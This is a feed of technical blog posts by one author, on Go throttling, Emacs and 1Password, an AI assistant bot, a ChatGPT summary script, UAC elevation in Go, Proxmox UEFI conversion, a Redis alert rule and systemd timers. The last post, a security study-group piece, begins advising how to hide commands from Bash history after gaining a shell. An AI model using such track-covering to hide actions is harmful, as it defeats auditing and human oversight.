DEV Community: Henrique Goncalves

O que é throttling e como implementar em Go

Henrique Goncalves — Wed, 17 Jul 2024 19:48:21 +0000

Originally posted at https://blog.hadenes.io/post/throttling-go/

Em uma das minhas sessões de mentoria, me perguntaram sobre throttling.

Throttling é uma técnica utilizada em diversas áreas da tecnologia para controlar o uso excessivo de recursos, limitando a taxa de execução de certa ação em um determinado período de tempo, podendo adicionar os eventos extras à uma fila de processamento ou descartá-los por completo.

Entendendo o throttling

Imagine um restaurante muito popular que recentemente viralizou nas redes sociais. Suponha que a cozinha do restaurante só consiga preparar até 10 pratos por hora, devido à capacidade dos cozinheiros e dos equipamentos.

Se o restaurante simplesmente tentar receber todo mundo que chega, ele terá problemas:

Os cozinheiros serão inundados com mais pedidos do que podem lidar
A qualidade dos pratos provavelmente cairá, pois os cozinheiros tentariam preparar os pratos com pressa
O tempo de espera dos clientes aumentará significativamente, e muitos iriam embora insatisfeitos
Faltarão mesas, e clientes ficarão em pé

Agora, considere que o restaurante implementou um limite ao número de clientes que atende simultaneamente.

Cada cliente que chega ao restaurante recebe um número de acordo com a ordem de chegada
Se já houver 10 clientes sendo atendidos, qualquer novo cliente precisa esperar sua vez na fila antes de fazer o pedido
À medida que a cozinha termina um prato e o entrega ao cliente, o próximo da fila pode fazer seu pedido

A fila garante que todos os clientes sejam atendidos de forma justa e em ordem de chegada. Isso mantém um fluxo contínuo e controlado de pedidos sendo processados.

A cozinha do restaurante é equivalente ao servidor ou à capacidade de processamento de uma API

Os clientes chegando ao restaurante representam usuários ou serviços que fazem requisições ao servidor

A fila de espera é o mecanismo de fila ( queue ) usado para gerenciar requisições que excedem a capacidade do sistema

O limite de 10 pratos por hora é o throttling , limitando o número de requisições que o servidor pode processar em um dado período de tempo.

Implementando throttling em Go

Vamos implementar um exemplo simples de throttling em Go.

Neste exemplo, vamos limitar a execução de uma função a 5 vezes por segundo.

Channels

Os channels são uma das principais ferramentas para comunicação entre goroutines em Go. Eles são usados para enviar e receber dados entre goroutines.

É possível verificar se um channel é capaz de receber um evento imediatamente ou se ele está bloqueado. Esse será o princípio básico para implementar nosso throttling.

Exemplo


package main

import (
    "fmt"
    "time"
)

var interval = 5 * time.Second

func monitor(ch <-chan string) {
    ticker := time.NewTicker(interval)

    for {
        select {
        case <-ticker.C:
            fmt.Println(<-ch)
        }
    }
}

func main() {
    var ch = make(chan string, 1)

    go monitor(ch)

    for i := 0; i < 100; i++ {
        select {
        case ch <- fmt.Sprintf("Message %d", i):
        default:
            fmt.Println("Channel is full!")
        }
        time.Sleep(1 * time.Second)
    }
}

Vamos entender o que está acontecendo no código acima:

1. Pacote principal e importação de bibliotecas


package main

import (
    "fmt"
    "time"
)

package main: Define o pacote principal do programa Go, necessário para a execução.
import "fmt" e import "time": Importa os pacotes para formatação de strings e manipulação de tempo, respectivamente.

2. Variáveis globais


var interval = 5 * time.Second

interval: Essa variável global define o intervalo de tempo de 5 segundos para o throttling. Ou seja, a função monitor somente aceitará mensagens a cada 5 segundos.

3. Função `monitor`


func monitor(ch <-chan string) {
    ticker := time.NewTicker(interval)

    for {
        select {
        case <-ticker.C:
            fmt.Println(<-ch)
        }
    }
}

monitor(ch <-chan string): Uma função que recebe um channel somente de leitura do tipo string.
ticker := time.NewTicker(interval): Cria um ticker que envia um evento a cada intervalo de tempo definido (5 segundos neste exemplo).
for { select { ... } }: Inicia um loop infinito que usa uma construção select para lidar com operações de recebimento no channel.
case <-ticker.C: fmt.Println(<-ch): Quando o ticker envia um evento (a cada 5 segundos), um valor é recebido do channel ch e impresso.

4. Função `main`


func main() {
    var ch = make(chan string, 1)

    go monitor(ch)

    for i := 0; i < 100; i++ {
        select {
        case ch <- fmt.Sprintf("Message %d", i):
        default:
            fmt.Println("Channel is full!")
        }
        time.Sleep(1 * time.Second)
    }
}

var ch = make(chan string, 1): Cria um channel de string com buffer de tamanho 1.
go monitor(ch): Inicia a função monitor em uma goroutine, permitindo que ela funcione de forma assíncrona.
O laço for i := 0; i < 100; i++ { ... } tenta enviar 100 mensagens para o channel ch:
- select { case ch <- fmt.Sprintf("Message %d", i): default: fmt.Println("Channel is full!") }: Tenta enviar a mensagem formatada para o channel. Se o channel estiver cheio (o que pode acontecer, já que o buffer é de tamanho 1 e as mensagens são processadas apenas a cada 5 segundos), o default é executado e a mensagem “Channel is full!” é impressa.
- time.Sleep(1 * time.Second): O loop espera 1 segundo antes de tentar enviar a próxima mensagem.

Resumo

Este código implementa throttling ao combinar channels e tickers para processar mensagens a cada 5 segundos.
A função monitor é usada para consumir as mensagens do channel de forma controlada (a cada 5 segundos).
A função main tenta enviar 100 mensagens para o channel com uma espera de 1 segundo entre cada tentativa. Se o channel estiver cheio, uma mensagem de aviso é impressa.

Testando o código

Para testar o código, basta salvá-lo em um arquivo Go (por exemplo, throttling.go) e executá-lo.

Você verá a saída das mensagens sendo impressas a cada 5 segundos, devido ao throttling implementado,


go run throttling.go
Channel is full!
Channel is full!
Channel is full!
Channel is full!
Message 0
Channel is full!
Channel is full!
Channel is full!
Channel is full!
Message 5
Channel is full!
Channel is full!
Channel is full!
Channel is full!
Message 10
...

Este é um exemplo simples de como implementar throttling em Go. Você pode ajustar o intervalo de tempo, o tamanho do buffer do channel e outras configurações para atender às necessidades específicas do seu aplicativo.

Ao invés de imprimir Channel is full, você poderia adicionar os eventos extras à uma fila de processamento ou descartá-los por completo, dependendo dos requisitos do seu aplicativo.

Espero que este exemplo tenha sido útil para entender o conceito de throttling e como implementá-lo em Go. Se tiver alguma dúvida ou sugestão, fique à vontade para compartilhar nos comentários.

Até a próxima!

1password.el: Integrating 1Password with Emacs and auth-source

Henrique Goncalves — Wed, 07 Jun 2023 04:52:13 +0000

Originally posted at https://blog.hadenes.io/post/1password.el/

In this blog post, we will discuss an Emacs package called 1password.el that allows users to integrate 1Password directly with Emacs and Auth-Source for a seamless and efficient password management experience.

Core Functions

The 1password.el package focuses on integrating the latest 1Password CLI version to work seamlessly with Emacs. The primary functions provided in the README of this package are as follows:

M-x 1password-get-password NAME: This interactive function retrieves the password of an item with the given NAME (e.g., “github”) from your 1Password vault.
M-x 1password-get-field NAME FIELD: In addition to passwords, this function allows you to fetch any field with a given label, FIELD, for the specified item, NAME. For example, you can retrieve the api_key associated with your “github” account.
M-x 1password-auth-source-enable: This function enables the Auth-Source backend integration with 1Password. By activating this feature, Emacs will utilize 1Password when fetching passwords for other Emacs features that rely on Auth-Source.

Requirements

To get started with using the 1password.el module, you need:

Emacs 25.1 or later
op command line tool, which can be found at 1Password command line tool

Installation

For emacs-doom:

;; in packages.el

(package! 1password
  :recipe (:host github :repo "kamushadenes/1password.el" :files ("*.el")))


;; in config.el

(use-package! 1password
  :demand t
  :init
  (message "Enabling 1password ...")
  :config
  (1password-auth-source-enable))

Chloe AI Assistant

Henrique Goncalves — Mon, 20 Mar 2023 08:33:13 +0000

Originally posted at https://blog.hadenes.io/post/chloe-ai-assistant/

Chloe AI Assistant

Chloe is a powerful AI Assistant written in Go that leverages OpenAI technologies (ChatGPT, Whisper, and DALL-E) along with Google’s Text-to-Speech engine to provide versatile and comprehensive assistance.

It offers multiple interfaces and utilizes the Chain of Thought approach to understand and respond to complex instructions.

Features

Use Chain of Thought to determine actions, falling back to standard completion if no action is found
Scrape websites to have them on its context
Search Google for information
Perform calculations
Use Google’s Text-to-Speech engine to speak
Use OpenAI’s DALL-E to generate images

Due to the Chain of Thought approach, Chloe can also be extended with additional capabilities by simply adding new actions.

Installation

Clone the repository


git clone https://github.com/kamushadenes/chloe.git

Change directory to the project folder


cd chloe

Compile


go build -o chloe cmd/chloe/main.go

Setup the required environment variables


export TELEGRAM_TOKEN="your_telegram_bot_token"
export OPENAI_API_KEY="your_openai_api_key"
export GOOGLE_APPLICATION_CREDENTIALS="/path/to/credentials.json"

Usage

Running the chloe binary will start the bot.


./chloe

You can use Chloe in multiple ways.

Chloe can be used as a Telegram bot. To use it, you need to create a bot using the BotFather and set the TELEGRAM_TOKEN environment variable to the token provided by the BotFather.

Start a conversation with your bot
Just chat.

Chloe should automatically detect what you want to do and respond accordingly, including images and voice messages. You can also send voice messages and it will convert them to text and respond accordingly.

The following commands are available:

/listmodes - Retrieve the list of all available bot modes or personalities
/forget - Wipe all context and reset the conversation with the bot
/mode - Instruct the bot to switch to a different mode or personality
/generate - Generate an image using DALL-E
/tts - Converts text to speech

Examples

Here, Chloe understands that I want an image of a cat and responds with one. It also understands when I ask it to give the cat a cute yellow hat, and it preserves the context of the previous image.

You can see how Chloe reasons about the context and understands what I want to do.

Here, Chloe says “Beware of the dog, the cat is shady too”. I then ask (in a voice message) for it to show me a picture of what she just said, and she generates relevant images.

HTTP

Chloe can also be used as an HTTP server. By default, it will listen on port 8080. You can change this by setting the PORT environment variable.

The following endpoints are available:

POST /api/complete

This endpoint will complete the given text using OpenAI’s ChatGPT.

Request


{
"content": "Hello, Chloe!"
}

Response

Text

If the response is a text (the default), you’ll receive a streamed response. You can use curl’s -Nflag to receive the text as it’s generated.


curl -N -X POST -H "Content-Type: application/json" -d '{"content": "Hello, Chloe!"}' http://localhost:8080/api/complete



Hello Henrique! How can I assist you today?

Image

In case the Chain of Thought detects the user wants to generate an image, you’ll receive the PNG image as a response.


curl -N -X POST -H "Content-Type: application/json" -d '{"content": "show me a picture of a cat"}' http://localhost:8080/api/complete

Audio

In case the Chain of Thought detects the user wants to convert text to speech, you’ll receive the MP3 audio as a response.


curl -N -X POST -H "Content-Type: application/json" -d '{"content": "Say out loud: Hello, my name is Chloe!"}' http://localhost:8080/api/complete

Command Line (CLI)

Chloe can also be used as a command line interface. This is useful for testing purposes.


./chloe \[command\]

The following commands are available:

complete [args] - Complete the given text using OpenAI’s ChatGPT
generate [args] - Generate an image using DALL-E
tts [args]- Converts text to speech
forget - Wipe all context and reset the conversation with the bot

If you call complete without any arguments, it will start a REPL.


./chloe complete

Contributing

We welcome contributions! If you would like to improve Chloe, please follow these steps:

Fork the repository
Make your changes
Open a pull request

License

Chloe is licensed under the MIT License.

References

A simple Python implementation of the ReAct pattern for LLMs

Acknowledgements

sashabaranov for the Go OpenAI SDK
awesome-chatgpt-prompts for the personalities

Simplifying Blog Writing with OpenAI's ChatGPT API - Auto-generating Summaries, Tags, and Titles for Your Posts

Henrique Goncalves — Thu, 02 Mar 2023 06:00:00 +0000

Originally posted at https://blog.hadenes.io/post/generating-blog-post-summaries-with-chatgpt/

As a blogger, you know how important it is to create compelling content that engages your readers. But coming up with catchy titles, insightful summaries, and relevant tags can be time-consuming and challenging. I know I struggle a lot with this, no matter how well I know the topic I’m writing about.

Enter OpenAI’s ChatGPT API.

They recently (March 1, 2023) released the ChatGPT model that powers the web interface, gpt-3.5-turbo, and it’s now available for developers to use in their own applications. You can read more about it in their blog post, there are other exciting news there too.

In this blog post, I will walk you through a script that uses this new model to automate the process of generating summaries, tags, and titles for your blog posts.

And yes, a great deal of this post was generated by the ChatGPT model. Sue me.

Prerequisites

Before we begin, you will need to have the following:

A OpenAI API key
Python 3.x installed on your system

If you haven’t already, you can sign up for OpenAI API access on their website.

Installing the Dependencies


pip install openai backoff python-frontmatter

The Script


import glob
import json
import sys
import termios
import tty

import backoff
import frontmatter
import openai

openai.api_key = "OPENAI_API_KEY"

def _getch():
    fd = sys.stdin.fileno()
    old_settings = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)
        ch = sys.stdin.read(1)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
    return ch

@backoff.on_exception(backoff.expo, openai.error.RateLimitError)
def completions_with_backoff(**kwargs):
    return openai.ChatCompletion.create(**kwargs)

system_prompt = [
    "You are ChatGPT, a helpful assistant.",
    "You generate insightful short summaries and relevant tags for user supplied blog posts.",
    "Assume that the blog posts are in Markdown format.",
    "You don't generate summaries that are cryptic or unhelpful.",
    "You don't generate clickbait titles or summaries.",
    "The summary you generate is SEO friendly and no longer than 80 characters.",
    "Tags you generate are SEO friendly, lowercase and a single word each.",
    "You can reply with a title field that is different from the original if it's more SEO friendly.",
    "If the language is pt_BR, you must generate a summary and a title in Brazilian portuguese.",
    "The title field should be a string.",
    "The summary field should be a string.",
    "The tags field should be a list of strings.",
    "Don't include any kind of notes."
    "Your response should be in JSON format.",
    "Don't reply with anything other than the JSON object."
]

for fname in glob.glob("../content/english/post/*.md"):
    if fname.split('/')[-1] == "_index.md":
        continue

    with open(fname, "r") as f:
        post = frontmatter.loads(f.read())
        title = post['title']
        categories = post['categories']
        content = post.content
        summary = post.get('summary', '')
        tags = post.get('tags', [])
        generated = post.get('generated', False)
        language = post.get('language', 'en')
    print(f'{fname} ({language})')

    if generated:
        print(" skipping already generated post")
        print()
        continue

    user_prompt = [
        "Here's a blog post I'd like to summarize:",
        f"title: {title}",
        f"categories: {categories}",
        f"tags: {tags}",
        f"language: {language}",
        "content:", content]

    context_length = len('\n'.join(system_prompt + user_prompt)) * 0.75
    context_length_without_content = len('\n'.join(system_prompt + user_prompt[:-1])) * 0.75
    if context_length > 4096:
        print(" ! reducing context length...")
        diff = int(4096 - context_length_without_content)
        user_prompt[-1] = user_prompt[-1][:diff]

    while True:
        completion = completions_with_backoff(
            model="gpt-3.5-turbo",
            messages=[
                {"role": "system", "content": '\n'.join(system_prompt)},
                {"role": "user", "content": '\n'.join(user_prompt)},
            ],
        )

        result = {}
        try:
            result = json.loads(completion["choices"][0]["message"]["content"].strip())
        except json.decoder.JSONDecodeError:
            try:
                fields = completion["choices"][0]["message"]["content"].strip().split('\n')
                for field in fields:
                    key = field.split(':')[0].strip()
                    value = ':'.join(field.split(':')[1:])
                    result[key] = value
            except Exception as e:
                print(" [-] Failed to parse response")
                print(completion)
                print()
                continue

        print(completion)
        new_title = result.get('title', title).strip()
        new_summary = result.get('summary', summary).strip()
        new_tags = result.get('tags', tags)

        print()
        print(f" oldTitle: {title}")
        print(f" newTitle: {new_title}")
        print()
        print(f" oldTags: {tags}")
        print(f" newTags: {new_tags}")
        print()
        print(f" oldSummary: {summary}")
        print(f" newSummary: {new_summary}")
        print()

        print(" accept? [y/n/s/q] ", end=' ')
        sys.stdout.flush()
        ch = _getch()

        print()
        if ch == 'y':
            post['title'] = new_title
            post['tags'] = new_tags
            post['summary'] = new_summary
            post['generated'] = True
            with open(fname, "w") as f:
                f.write(frontmatter.dumps(post))
            print(' saved...')
            print()
            break
        elif ch == 'n':
            print(' retrying...')
            print()
            continue
        elif ch == 'q':
            print(' exiting...')
            print()
            exit(0)
        else:
            print(' skipping...')
            print()
            break

Example output


python3 generate_summaries.py
../content/english/post/prometheus-alerting-rule-for-redis-clients.md (en)
  skipping already generated post

../content/english/post/corredores-da-loucura-parte-2.md (pt_BR)
  skipping already generated post

../content/english/post/making-the-most-out-of-your-yubikey-4.md (en)
  skipping already generated post

../content/english/post/why-management-ladders-should-start-higher.md (en)
  skipping already generated post

../content/english/post/on-salary-ceilings.md (en)
  skipping already generated post

../content/english/post/the-role-of-the-leader-when-experts-talk.md (en)
  skipping already generated post

../content/english/post/on-task-assignment.md (en)
  skipping already generated post

../content/english/post/a-natureza-e-o-homem.md (en)
  skipping already generated post

../content/english/post/systemd-timers-vs-code-loops.md (en)
  ! reducing context length...

  oldTitle: SystemD Timers vs Code Loops
  newTitle: SystemD Timers vs Code Loops

  oldTags: ['timers', 'code', 'systemd']
  newTags: ['timers', 'code', 'systemd', 'linux', 'timerfd', 'resource accounting']

  oldSummary: Comparing the effectiveness of infinite loop strategies on Linux systems
  newSummary: Comparing SystemD Timers vs code loops effectiveness in computation
              and energy consumption on Linux, including the use of timerfd and 
              resource accounting

  accept? [y/n/s/q]
  saved...

Explanation

This script performs a task of generating summaries and relevant tags for user-supplied blog posts using OpenAI’s GPT-3 language model. The script reads the markdown files of blog posts from the ../content/english/post/ directory, extracts the necessary information like title, content, categories, tags, summary, and language from the file’s frontmatter, and generates a user prompt to get the summary and tags using GPT-3.

The script uses the openai Python package to access the GPT-3 API, which requires an API key to be set using openai.api_key. It also uses the frontmatter package to extract information from the markdown files' frontmatter and the glob package to read all markdown files in the specified directory.

The completions_with_backoff function uses the backoff package to retry the API call if it encounters a RateLimitError exception. It calls the openai.ChatCompletion.create() method to generate the completion using the GPT-3 language model specified by the model parameter and the user prompt specified by the messages parameter.

The script generates a system_prompt list containing the prompts for the language model. The user_prompt list is generated for each blog post and contains the information extracted from the post’s frontmatter and the language model prompts.

The script then calculates the context_length and context_length_without_content of the user prompt and checks if it exceeds the maximum length of 4096 characters allowed by the GPT-3 API. If the length exceeds the limit, it truncates the content field of the user prompt.

The script then enters a loop to generate a completion for the user prompt and prints the current state of the post, including the old and new title, tags, and summary generated by GPT-3. The user can then accept, reject, or skip the generated summary and tags by entering ‘y’, ‘n’, or ’s' respectively. Entering ‘q’ will exit the script.

If the user accepts the generated summary and tags, the script updates the post’s frontmatter with the new information and sets the generated field to True. Finally, it writes the updated frontmatter back to the file and moves on to the next post.

Prompting

In the context of natural language processing and artificial intelligence, prompting refers to the process of providing input to a language model or AI system to generate a response or output. A prompt can be a question, a statement, or any other form of input that the language model or AI system can process to generate a relevant response. The quality of the prompt can have a significant impact on the quality and relevance of the output generated by the language model or AI system. Therefore, designing effective prompts is an essential part of developing natural language processing and AI systems that can effectively understand and respond to human language.

This prompt exists as a set of guidelines for OpenAI’s ChatGPT language model to ensure that it generates insightful summaries and relevant tags for user-supplied blog posts in a consistent and user-friendly manner. The prompt outlines the requirements for the length and format of the summary and tags and ensures that they are SEO-friendly and easy to understand. Additionally, the prompt specifies that the language model should not generate clickbait titles or summaries and that it should avoid generating cryptic or unhelpful content. Finally, the prompt provides guidelines for generating responses in different languages and ensuring that the output is formatted correctly.

I also try my best to have the output be as consistent as possible. Language models are not deterministic, so the output can vary slightly each time you run the script. Getting a valid JSON most of the time is already a win.

Conclusion

In conclusion, the potential of language models like GPT-3 is vast and far-reaching, and helping bloggers is just one of the many possibilities they offer.

From healthcare to finance, legal services to customer service, and beyond, these models can transform industries by automating tasks, improving efficiency, and enhancing the way we live and work.

Their ability to understand and generate human-like language has opened up a world of new possibilities for developing innovative solutions that can make our lives easier and more convenient.

As research in this area continues to evolve, we can expect to see even more exciting applications of language models that can shape the future of technology and how we interact with it.

As these language models continue to advance and become more powerful, it raises important questions about the potential impact on information security.

With the ability to generate convincing and sophisticated language, there is a risk (a concrete one, already seem in the wild) of these models being used for malicious purposes, such as generating convincing phishing emails, fake news, or even deepfakes.

As a society, we need to be mindful of these risks and take proactive steps to address them.

This might include developing new strategies for detecting and preventing the misuse of language models, investing in more advanced security measures, and educating users on how to identify and protect themselves against potential threats.

Ultimately, it is up to all of us to ensure that these powerful tools are used responsibly and ethically to advance our collective interests and improve our lives.

How to Request Admin Permissions in Windows Through UAC with Golang

Henrique Goncalves — Wed, 15 Feb 2023 07:59:42 +0000

Originally posted at https://blog.hadenes.io/post/how-to-request-admin-permissions-in-windows-through-uac-with-golang/

In Windows, User Account Control (UAC) is a security feature that helps prevent unauthorized changes to the operating system. When an application requires elevated privileges to perform certain actions, UAC prompts the user for permission to proceed.

In this guide, we’ll show you how to request admin permissions in Windows through UAC using Golang.

So yeah, it’s basically sudo.

Requesting Admin Permissions

To request admin permissions in Windows through UAC with Golang, you’ll need to use the syscall and windows packages. Here’s how you can do it:


package main

import (
    "syscall"
    "time"
    "os"
    "strings"
    "fmt"
    "golang.org/x/sys/windows"
)

func becomeAdmin() {
    verb := "runas"
    exe, _ := os.Executable()
    cwd, _ := os.Getwd()
    args := strings.Join(os.Args[1:], " ")

    verbPtr, _ := syscall.UTF16PtrFromString(verb)
    exePtr, _ := syscall.UTF16PtrFromString(exe)
    cwdPtr, _ := syscall.UTF16PtrFromString(cwd)
    argPtr, _ := syscall.UTF16PtrFromString(args)

    var showCmd int32 = 1 //SW_NORMAL

    err := windows.ShellExecute(0, verbPtr, exePtr, argPtr, cwdPtr, showCmd)
    if err != nil {
        fmt.Println(err)
    }
}

func checkAdmin() bool {
    _, err := os.Open("\\\\.\\PHYSICALDRIVE0")

    return err == nil
}

The becomeAdmin() function elevates the current executable to admin privileges. It retrieves the path and arguments of the current executable using os.Executable() and os.Args , respectively, and uses windows.ShellExecute() to run the executable with elevated privileges.

The checkAdmin() function checks if the current process is running with admin privileges. It does this by attempting to open the physical drive using os.Open(). If an error occurs, the function returns false.

To use these functions, you can call checkAdmin() to check if the current process is running with admin privileges. If not, call becomeAdmin() to elevate the current process:


if !checkAdmin() {
    becomeAdmin()

    time.Sleep(2 * time.Second)

    os.Exit(0)
}

This will kill the original process and spawn a new one with admin privileges, so you likely want this to be the first thing to run.

Source

This guide is based on the Gist created by user jerblack , which can be found at https://gist.github.com/jerblack/d0eb182cc5a1c1d92d92a4c4fcc416c6.

Convert a Proxmox Windows Guest from BIOS to UEFI

Henrique Goncalves — Wed, 15 Feb 2023 07:27:58 +0000

Originally posted at https://blog.hadenes.io/post/convert-a-proxmox-windows-guest-from-bios-to-uefi/

In order to upgrade to a guest to Windows 11 or to passthrough a GPU the way it’s recommended in the official Proxmox documentation, you need to make sure the guest uses UEFI to boot.

By default, Proxmox uses SeaBIOS, thus chances are high that your Windows guest was installed in BIOS mode.

Gladly, in Windows 10, there’s a quick and easy fix to that. In this guide, I’ll walk you through the steps needed to convert your Proxmox Windows guest to UEFI.

This guide is based on the information provided in a Reddit post by user Browncow8.

Prerequisites

Before you begin, you’ll need to make sure that your Windows guest meets the following prerequisites:

It is running Windows 10 version 1703 or later

Converting the Windows Guest to UEFI

Once you have the prerequisites in place, follow these steps to convert your Proxmox Windows guest to UEFI:

Open Command Prompt as an administrator in the guest machine.
Run the following command to validate the conversion process:

mbr2gpt /validate /allowFullOS

If the validation is successful, run the following command to convert the disk to GPT format:

mbr2gpt /convert /disk:0 /allowFullOS

Power down the machine.
Open the Proxmox web interface and navigate to the options for the guest machine.
Add a new “EFI disk” to the guest machine, making sure to enable the “Pre-Enrolled-Keys” option.
Add a new “TPM” device to the guest machine. (only necessary if you plan to upgrade to Windows 11)
Change the “BIOS” option from “SeaBIOS” to “OVMF”.
Change the “Machine” option to “q35”. (only if you wish to passthrough the GPU as a PCIe device)
Start the guest machine.

_Note: If you receive an error saying Failed to update ReAgent.xml, it refers to the hidden recovery environment and it should be ok to ignore it, or you can try

reagentc /disable

followed by

reagentc /enable

That’s it! You have successfully converted your Proxmox Windows guest to UEFI.

If you’re performing GPU passthrough to the Windows guest, make sure to follow the additional steps found in the Proxmox documentation at https://pve.proxmox.com/wiki/Pci_passthrough#GPU_Passthrough.

If you encounter any problems during the conversion process or with GPU passthrough, refer to the Proxmox documentation or seek help from the Proxmox community forums.

Prometheus Alerting Rule for Redis Clients

Henrique Goncalves — Fri, 19 Mar 2021 05:13:35 +0000

Originally posted at https://blog.hadenes.io/post/prometheus-alerting-rule-for-redis-clients/

Recently, a customer auto scaling farm got out of hand due to a misconfiguration on their end, which led to Redis maximum number of connections to be exceeded, leading to a lot of requests failing.

Curiously, they were way below the default maximum number of clients of 10000.

After some digging up, it turns out that each client needs one file descriptor (well, that would have been easy to guess…), so they failed when they reached the default nofile limit of 1024.

The Redis documentation states the following:

In Redis 2.6 this limit is dynamic: by default it is set to 10000 clients, unless otherwise stated by the `maxclients` directive in Redis.conf.

However, Redis checks with the kernel what is the maximum number of file descriptors that we are able to open (the _soft limit_ is checked). If the limit is smaller than the maximum number of clients we want to handle, plus 32 (that is the number of file descriptors Redis reserves for internal uses), then the number of maximum clients is modified by Redis to match the amount of clients we are _really able to handle_ under the current operating system limit.

After the configuration error was fixed, we needed to ensure that never happened again, so I came up with this Prometheus alert rule to prevent that, based on the excellent set of rules from Awesome Prometheus:


alert: RedisTooManyConnections
expr: (sum by (instance) (redis_connected_clients + 32)) > (sum by (instance)
  (process_max_fds{job="node"} * 0.8))
for: 2m
labels:
  severity: warning
annotations:
  description: |-
    Redis instance has too many connections
      VALUE = {{ $value }}
      LABELS: {{ $labels }}
  summary: Redis too many connections (instance {{ $labels.instance }})

This will alert if they reach 80% of the total available connections.

SystemD Timers vs Code Loops

Henrique Goncalves — Tue, 16 Mar 2021 11:56:16 +0000

Originally posted at https://blog.hadenes.io/post/systemd-timers-vs-code-loops/

In this post, we are going to compare the differences in effectiveness, from a computation and energy consumption perspective, between SystemD Timers and in-code loops for executing infinite loops.

We’ll focus specifically on Linux, since features such as timerfd are only available on it, although similar implementations exist for BSD and OSX such as kqueue.

The inspiration of this post came from this StackOverflow thread.

The case for SystemD Timers

Pros

timerfd

SystemD makes use of the Linux Kernel’s timerfd timers, a POSIX timer alternative that is more event-loop friendly, since it notifies time expiration via file descriptors (hence the fd suffix), which allows for the use of things such as epoll.

Being event-loop based, it also facilitates multi-threading and is very resource friendly.

Also, POSIX timers are considered by some to have a terrible API.

Resource Accounting

If you add CPUAccounting and MemoryAccounting to your service’s [Service] block (or have those enabled by default), and also have CGroup accounting enabled (usually the default), you are able to known exactly how much resource your service unit consumed without having to resort to custom code or external tools.

By running systemctl status on such services, you get an output similar to the one below.

● docker.service - Docker Application Container Engine
     Loaded: loaded (/nix/store/j0y2wmaywsvf8hs7y4pqd4jhll0ncsa8-docker-19.03.12/etc/systemd/system/docker.service; enabled; vendor preset: enabled)
    Drop-In: /nix/store/ig74rh79479nq89dd20fjhsn82kf0xdh-system-units/docker.service.d
             └─overrides.conf
     Active: active (running) since Tue 2021-03-16 08:34:15 -03; 56min ago
TriggeredBy: ● docker.socket
       Docs: https://docs.docker.com
   Main PID: 2830 (dockerd)
         IP: 0B in, 0B out
      Tasks: 29 (limit: 4915)
     Memory: 163.3M <<<<< Memory Accounting
        CPU: 9.710s <<<<< CPU Accounting
     CGroup: /system.slice/docker.service
             ├─2830 /nix/store/j0y2wmaywsvf8hs7y4pqd4jhll0ncsa8-docker-19.03.12/libexec/docker/dockerd --group=docker --host=fd:// --log-driver=journald --live-restore
             └─2844 containerd --config /var/run/docker/containerd/containerd.toml --log-level info

Last Run and Next Run

With SystemD, by running systemctl list-timers you are able to conveniently check when the timer was last run, when it’s scheduled to run next and how much time is left before that happens. You are also able to see when the timer suceeded for the last time.

Immediate Changes

When you run a timer, any change you make to your program or script will of course be used next time it runs.

If your service where to loop in it’s on code, you would need to restart it in order to apply the changes.

A trivial matter, but worth considering.

Cons

Startup Cost

A timer needs to pay the cost of starting up the application every time it runs.

The impact of this obviously depends on your specific use case.

In a particular case of mine where I use nix-shell, this cost in not irrelevant, although I mitigated it using cached-nix-shell.

Excessive Logging

Each time the unit starts or stops, a new log entry is created on the journal.

For very frequent tasks, this may fill your journal with useless information.

Apparently this can be mitigated by using LogLevelMax=alert on the service definition, but I haven’t tested this.

Accuracy

Not exactly a con since it can be easily configured around, but by default SystemD timers have an accuracy of 1 minute. T

his means that, much like Cron, your minimum interval by default is 1 minute.

This can be fixed by setting AccuracySec to something lower.

For scripts that I want to run every 2 seconds or so, I set AccuracySec=1s, but you can go as lower as AccuracySec=1us, although that’s likely overkill and will generate much more wake-ups than you actually need, consuming more battery.

Set it to a sane amount based on your exact need.

The case for Code Loops

This part is extremely difficult to summarize, since each and every programming language has their very own way of handling timers.

On Python, for example, you can use linuxfd to interface with the same timerfd SystemD uses, achieving a very similar result. By default, if I’m not mistaken, calling functions such as sleep makes use of the default POSIX Timer interface.

On C, you obviously have easy access to any syscall you need, allowing you to use the implementation that suits you best.

For JVM-based languages, such as Java, Clojure, Kotlin (the list goes on…), it mainly depends on the specific JVM implementation, but it most likely ends up mapping to the default POSIX Timer on Unix systems.

In Shell, since each and every instruction is a command, you basically have startup costs for every line anyway, so it doesn’t matter.

As a clear pro, you are able to have much more granular control of when and how your code loops.

Charts

TBD

Conclusion

Resource consumption wise, it’s usually the case for in-code loops to be lighter, since you are avoiding the startup costs.

But in conclusion, use whatever suits you best.

If you just need to run a simple script every few seconds or so and don’t want to worry about treating errors etc, just put it under a SystemD timer, configure Restart accordingly and forget about it.

If you otherwise need more complex scenarios, use in-code loops as you normally would, and consider implementing systemd-notify for tighter integration.

Fun with Shells

Henrique Goncalves — Wed, 13 Nov 2019 09:14:32 +0000

Originally posted at https://blog.hadenes.io/post/fun-with-shells/

Fun with Shells

This is part of a series of articles meant to guide newcomers and professionals alike on important security topics, and sometimes questions from certifications like CEH will be used as the initial instigator to the article. Topics vary from the very basic to the really advanced stuff.

We are in no way associated with EC Council or any other group or company, and the only purpose of this series is to sum up our study group learnings.

A shell is basically the command line interface you are likely to use on a daily basis on a Unix-based operating system. It’s nothing more than an user interface where you can type commands using a well-known syntax.

We approach more advanced subjects that assume you know your way around. If that is not the case or if you want to learn about shell in-depth, I highly recommend Aurelio Jargas’ book on the matter.

Covering Tracks

So you popped a shell. Nice! First thing you should do is ensure your steps aren’t being monitored.

Keep in mind this section is only about Shell, and doesn’t cover things like auditd and other auditing systems. Don’t risk your life only on that! Still, it’s a useful knowledge for quick stuff.

All I need is a little space

Suppose you don’t want to disable logging for an entire session. You only want that nasty little command of yours to go unnoticed, but it’s ok to leave other commands (or even preferable, in case you want to hide in plain sight).

For this to work you need to understand the functioning of a internal variable called HISTCONTROL .

According to the Bash manpage:

HISTCONTROL  
    A colon-separated list of values controlling how commands are saved on the history list. If the list of values includes ignorespace, lines which begin with a space character are not saved in the history list. A value of ignoredups causes lines matching the previous history entry to not be saved. A value of ignoreboth is shorthand for ignorespace and ignoredups. A value of erasedups causes all previous lines matching the current line to be removed from the history list before that line is saved.  
    Any value not in the above list is ignored. If HISTCONTROL is unset, or does not include a valid value, all lines read by the shell parser are saved on the history list, subject to the value of HISTIGNORE. The second and subsequent lines of a multi-line compound command are not tested, and are added to the history regardless of the value of HISTCONTROL.

